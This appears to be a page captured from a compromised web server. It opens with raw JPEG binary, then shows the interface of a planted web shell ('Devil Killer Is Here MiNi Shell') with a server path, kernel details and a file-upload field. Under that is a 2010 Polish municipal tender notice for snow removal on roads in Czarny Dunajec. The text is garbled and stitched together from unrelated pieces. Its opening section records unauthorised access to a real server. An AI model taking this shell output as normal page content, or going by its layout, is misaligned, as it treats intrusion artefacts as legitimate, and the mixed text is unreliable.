JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101011/281567-N-2010.html

<p class="kh_header"><b>Czarny Dunajec: Odśnieżanie dróg gminnych na terenie gminy Czarny Dunajec w sezonie zimowym 2010/2011</b><br>
<b>Numer ogłoszenia: 281567 - 2010; data zamieszczenia: 11.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Czarnym  Dunajcu , ul. Piłsudskiego 2, 34-470 Czarny Dunajec, woj. małopolskie, tel. 018 2613540, faks 018 2613530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarny-dunajec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odśnieżanie dróg gminnych na terenie gminy Czarny Dunajec w sezonie zimowym 2010/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odśnieżanie dróg gminnych na terenie gminy Czarny Dunajec i chodników, posypywanie dróg oraz wywóz śniegu z placów wskazanych przez Zamawiającego w sezonie zimowym 2010/2011. Ponadto dla Czarnego Dunajca będzie wymagane również pozimowe sprzątanie nawierzchni dróg asfaltowych i chodników na wyznaczonych odcinkach.  
W ofercie należy podać cenę 1 m-g efektywnej pracy sprzętu przy odśnieżaniu dróg oraz chodników, cenę wywozu 1m3 śniegu przy wywozie śniegu, cenę posypania kruszywem 1m2 drogi oraz cenę za pozimowe sprzątanie 1m2 drogi lub chodnika (dotyczy tylko Czarnego Dunajca).

Zamawiający podzielił zamówienie na 15 zadań tj.:
Zadanie nr 1 - Zimowe utrzymanie w miejscowości Chochołów
Zadanie nr 2 - Zimowe utrzymanie w miejscowości Ciche
Zadanie nr 3 - Zimowe utrzymanie w miejscowości Czarny Dunajec
Zadanie nr 4 - Zimowe utrzymanie w miejscowości Czerwienne
Zadanie nr 5 - Zimowe utrzymanie w miejscowości Dział
Zadanie nr 6 - Zimowe utrzymanie w miejscowości Koniówka
Zadanie nr 7 - Zimowe utrzymanie w miejscowości Odrowąż
Zadanie nr 8 - Zimowe utrzymanie w miejscowości Piekielnik
Zadanie nr 9 - Zimowe utrzymanie w miejscowości Pieniążkowice
Zadanie nr 10 - Zimowe utrzymanie w miejscowości Podczerwone
Zadanie nr 11 - Zimowe utrzymanie w miejscowości Podszkle
Zadanie nr 12 - Zimowe utrzymanie w miejscowości Ratułów
Zadanie nr 13 - Zimowe utrzymanie w miejscowości Stare Bystre
Zadanie nr 14 - Zimowe utrzymanie w miejscowości Wróblówka
Zadanie nr 15 - Zimowe utrzymanie w miejscowości Załuczne

Na podstawie wydatków poniesionych w sezonie zimowym 2009-2010 oraz szacunków, w ramach zamówienia  przewiduje się udzielenie: 
Zad. 1   odśnieżanie dróg: 176 m-g,  odśnieżanie chodników: 15 m-g, posypywanie: 900 m2,       wywóz śniegu: 1000 m3
Zad. 2   odśnieżanie dróg: 383 m-g,  odśnieżanie chodników: 20 m-g, posypywanie: 200000 m2, wywóz śniegu: 300 m3
Zad. 3   odśnieżanie dróg: 301 m-g,  odśnieżanie chodników: 30 m-g, posypywanie: 2000 m2,     wywóz śniegu: 2000 m3
              sprzątanie dróg i chodników: 2000 m3
Zad. 4   odśnieżanie dróg: 470 m-g, posypywanie: 300000 m2, wywóz śniegu: 200 m3
Zad. 5   odśnieżanie dróg: 58 m-g,   posypywanie: 500 m2,       wywóz śniegu :100 m3
Zad. 6   odśnieżanie dróg: 52 m-g,    odśnieżanie chodników: 10 m-g, posypywanie: 500 m2,     wywóz śniegu: 100 m3
Zad. 7   odśnieżanie dróg: 261 m-g,  odśnieżanie chodników: 10 m-g, posypywanie: 14500 m2, wywóz śniegu: 100 m3
Zad. 8   odśnieżanie dróg: 286 m-g,  odśnieżanie chodników: 30 m-g, posypywanie: 1000 m2,   wywóz śniegu: 100 m3
Zad. 9   odśnieżanie dróg: 131 m-g,  odśnieżanie chodników: 15 m-g, posypywanie: 1000 m2,   wywóz śniegu: 100 m3
Zad. 10 odśnieżanie dróg: 168 m-g, posypywanie: 1000 m2,     wywóz śniegu: 100 m3
Zad. 11 odśnieżanie dróg: 175 m-g, posypywanie: 175000 m2, wywóz śniegu: 100 m3
Zad. 12 odśnieżanie dróg: 377 m-g,  odśnieżanie chodników: 10 m-g, posypywanie: 200000 m2, wywóz śniegu: 100 m3
Zad. 13 odśnieżanie dróg: 191 m-g,  odśnieżanie chodników: 5 m-g, posypywanie: 21000 m2, wywóz śniegu: 100 m3
Zad. 14 odśnieżanie dróg: 31 m-g, posypywanie: 500 m2, wywóz śniegu: 100 m3
Zad. 15 odśnieżanie dróg: 128 m-g,  odśnieżanie chodników: 15 m-g, posypywanie: 500 m2, wywóz śniegu: 100 m3

Powyższe wielkości są wielkościami szacowanymi, rzeczywiste wielkości znane będą po udzieleniu zamówienia, zgodnie z potrzebami i panującymi warunkami atmosferycznymi.
Zamawiający przewiduje nie udzielenie bądź udzielenie innej wielkości niektórych usług w ramach wykonywanego zadania. 
Wykonawca w terminie 7 dni od zawarcia umowy na realizację zamówienia, zobowiązany jest przedłożyć Zamawiającemu polisę lub inny dokument potwierdzający, że jest on ubezpieczony od odpowiedzialności cywilnej w zakresie obejmującym przedmiot zamówienia oraz na czas jego realizacji.  Z dokumentu ma wynikać iż pokryte zostaną wszelkie ewentualne koszty szkód wyrządzonych na rzecz Zamawiającego oraz osób trzecich, powstałe z winy Wykonawcy w trakcie realizacji zamówienia.
Zamawiający wymaga aby Wykonawca każdorazowo po wykonaniu usługi odśnieżania, wywozu śniegu bądź posypywania w ciągu 24 godzin dostarczył Zamawiającemu potwierdzenie wykonania usługi zatwierdzone przez Sołtysa danego sołectwa (bądź osoby przez niego upoważnionej). 

Dopuszczone są następujące formy dostarczania Zamawiającemu potwierdzeń:
-	faksem na nr 18-26-135-30, przy czym oryginał potwierdzenia należy dostarczyć Zamawiającemu na Dziennik Podawczy w ciągu 7-miu dni (decyduje data wpływy faksu)   
-	osobiście, składając potwierdzenie na Dzienniku Podawczym w siedzibie Zamawiającego (decyduje data złożenia)
Niedostarczenie potwierdzenia Zamawiającemu w wyznaczonym terminie, skutkować będzie nie uznaniem wykonania usługi.
Osobą wyznaczoną w sprawach dotyczących potwierdzeń wykonania usług, jest pracownik: Krzysztof Łowisz  - tel. kontaktowy: 18-26-135-26 (I piętro, pok. nr 26 w Urzędzie Gminy).
Ilość i rodzaj wymaganego sprzętu przeznaczonego do świadczenia usług określony został w załączniku nr 8 do SIWZ).
Wymagania dotyczące odśnieżania chodników:
Udzielenie tego zamówienia uzależnione będzie od decyzji Sołtysów poszczególnych sołectw oraz Wójta Gminy. Może wystąpić sytuacja, że zlecenie nie będzie zrealizowane lub zrealizowane będzie w ograniczonym zakresie.
Odśnieżanie chodników nie dotyczy zadań nr 4, 5, 10, 11 oraz 14.
Do oferty należy podać cenę za 1 m-g pracy sprzętu przy odśnieżaniu chodnika. Cena ta ma zawierać wszelkie koszty wykonania usługi.
Niezależnie czy usługa ta będzie świadczona czy nie, Wykonawca powinien dysponować sprzętem umożliwiającym jej wykonanie.
Odcinki chodników przeznaczone do odśnieżania wskażą Sołtysi poszczególnych miejscowości. Ilość przepracowanych maszyno-godzin musi być każdorazowo potwierdzona przez sołtysa danej miejscowości.
Wymagania dotyczące wywozu śniegu:
Udzielenie tego zamówienia uzależnione będzie od decyzji Sołtysów poszczególnych sołectw oraz Wójta Gminy. Może wystąpić sytuacja, że zlecenie nie będzie zrealizowane lub zrealizowane będzie w ograniczonym zakresie.
Wykonawca we własnym zakresie i na własną odpowiedzialność zapewni miejsce rozładunku.
Do oferty należy podać cenę za 1 m3 wywożonego śniegu. Cena ta będzie zawierać załadunek, transport, rozładunek śniegu oraz przygotowanie placu pod rozładunek, zabezpieczenie miejsca, skąd będzie wywożony śnieg i uprzątnięcie tego miejsca po zakończeniu wywozu śniegu. Niezależnie czy usługa wywozu śniegu będzie świadczona czy nie, Wykonawca powinien dysponować sprzętem umożliwiającym wykonania tej usługi.
Drogi oraz place przeznaczone do odśnieżania wskażą Sołtysi poszczególnych miejscowości. Ilość przepracowanych godzin musi być każdorazowo potwierdzona przez sołtysa danej miejscowości. Wszystkie drogi gminne muszą być utrzymane wg V standardu zimowego utrzymania dróg (Załącznik nr 4 do SIWZ). Zamawiający wymaga, aby o godz. 7oo wszystkie drogi były przejezdne.
Wymagania odnośnie posypywania dróg:
Wszelkie uzgodnienia dotyczące posypywania dróg wykonawca uzgadnia z Sołtysem danej miejscowości. 	Może wystąpić sytuacja, że zlecenie nie będzie zrealizowane lub realizowane będzie w ograniczonym zakresie.
Zamawiający dopuszcza następujące materiały do posypywania dróg w celu zapobiegania i zwalczania śliskości zimowej:
-	piasek i żwiry o uziarnieniu 2-4 mm
-	drobne kruszywa naturalne o uziarnieniu 2-4 mm
-	grysy o uziarnieniu 2-4 mm
Wymagania odnośnie pozimowego sprzątania nawierzchnia dróg asfaltowych oraz chodników:
Wymaganie odnosi się wyłącznie do miejscowości Czarnym Dunajec.
Zadanie będzie polegało na oczyszczeniu z piasku i innych zanieczyszczeń powstałych w trakcie zimowego utrzymania dróg. Sprzątaniu będą podlegały tylko wyznaczone przez Sołtysa odcinki nawierzchni dróg asfaltowych oraz chodniki.
Wykonawca we własnym zakresie i na własną odpowiedzialność zapewni miejsce rozładunku zebranego w trakcie sprzątania materiału.
Do oferty należy podać cenę za 1 m2 sprzątanej powierzchni. Cena ta będzie zawierać posprzątanie, załadunek zebranego materiału, transport, rozładunek oraz zabezpieczenie miejsca  na czas sprzątania.
Czynności kontrolne Zamawiającego oraz upomnienia
Zamawiający przewiduje możliwość dokonywania w trakcie realizacji zamówienia, niezapowiedzianych kontroli Wykonawców. Kontrole mogą dotyczyć:
-	zgodności dysponowanego przez Wykonawcę sprzętu z wykazem określonym w ofercie przetargowej Wykonawcy i wymogami Zamawiającego, określonymi w Specyfikacji istotnych warunków zamówienia.
-	zgodności materiału przeznaczonego do posypywania dróg z wymaganiami Zamawiającego, określonymi w Specyfikacji istotnych warunków zamówienia.
W przypadku stwierdzenia uchybień w wyniku przeprowadzonych kontroli, Zamawiający wystosuje pisemne upomnienie do Wykonawcy.
Pisemne upomnienie może zostać wystosowane do Wykonawcy również w przypadku zwłoki w wykonaniu usługi i rażącego nie wywiązywania się z umowy. Po dwóch bezskutecznych upomnieniach na piśmie udzielonych Wykonawcy, Zamawiający odstąpi od umowy w trybie natychmiastowym, powiadamiając Wykonawcę pisemnie o tym fakcie.
W interesie Wykonawcy jest zdobycie wszelkich niezbędnych informacji koniecznych do przygotowania i złożenia oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:
-	w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, świadczył z należytą starannością usługi polegające na wykonaniu usług związanych z zimowym utrzymaniem dróg (kategorii co najmniej gminnych).
Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca: 
-	wykaże, że dysponuje potencjałem technicznym niezbędnym do realizacji części zamówienia, na którą/które składa ofertę (ilość i rodzaj sprzętu mają być zgodne z wykazem i opisem wymaganego sprzętu niezbędnego do realizacji zamówienia stanowiącym załącznik nr 8 do SIWZ)
Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca: 
-	wykaże, że dysponuje liczbą osób, niezbędną do realizacji części zamówienia, na którą/które składa ofertę. Osoby te mają posiadać odpowiednie kwalifikacje, upoważniające do wykonywania czynności objętych zamówieniem.
Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	wypełniony i podpisany formularz ofertowy - załącznik nr 1 do SIWZ.
-	pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.
-	podpisany/zatwierdzony projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może być dokonana w przypadku:
1)	zmian nieistotnych w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy
2)	w przypadku okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności:  
-	wydłużenia terminu wykonania zamówienia z uwagi na wystąpienie nadzwyczajnych warunków pogodowych nie pozwalających na wykonanie zamówienia zgodnie z warunkami wykonania określonymi w SIWZ, wystąpienia innych okoliczności niezależnych od wykonawcy, pod warunkiem wyrażenia zgody przez Zamawiającego. Termin może ulec przedłużeniu o czas trwania tych okoliczności.
-	z uwagi na niezależne od stron umowy zmiany dotyczące osób kluczowych dla realizacji umowy, zmiana w/w osób musi być uzasadniona przez Wykonawcę i zaakceptowana przez Zamawiającego. Kwalifikacje i doświadczenie wskazanych osób muszą być co najmniej takie same, jakie były wymagane w SIWZ.
-	zmiana regulacji prawnych obowiązujących w dniu zawarcia umowy
-	sytuacji, gdy Wykonawca opierał się na zasobach podmiotów trzecich wskazując spełnienie warunków udziału w postępowaniu, dopuszcza się zmianę tych podmiotów na etapie realizacji zamówienia, pod warunkiem, że nowy podmiot wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne
-	wystąpienia konieczności realizacji przez podwykonawcę części zamówienia, której wykonawca nie wskazał w ofercie, że powierzy ją do wykonania podwykonawcy, za zgodą zamawiającego i z zachowaniem zasad dot. podwykonawców określonych w umowie
-	zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy
3)	w przypadku zmian korzystnych dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czarny-dunajec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czarny Dunajec, ul. Józefa Piłsudskiego 2, (I piętro) - pokój nr 26. Dokumenty odpłatne.</p>
